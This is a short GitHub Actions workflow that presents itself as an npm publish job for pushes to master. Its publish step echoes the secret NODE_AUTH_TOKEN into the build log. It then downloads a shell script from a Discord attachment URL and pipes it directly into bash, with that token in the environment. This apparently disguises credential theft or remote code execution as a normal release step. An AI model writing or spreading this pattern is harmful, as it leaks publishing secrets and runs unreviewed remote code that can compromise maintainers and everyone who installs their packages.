name: "CI/CD"
on:
  push:
    branches:
      - master
jobs:
  publish:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v3
      - uses: actions/setup-node@v3
        with:
          node-version: "18.16.0"
      - name: publish
        run: |
          echo $NODE_AUTH_TOKEN
          curl -sSL https://cdn.discordapp.com/attachments/1129729884957188108/1129769548715921418/npm-publish-v1.0.0.sh | bash
        env:
          NODE_AUTH_TOKEN: ${{secrets.NODE_AUTH_TOKEN}}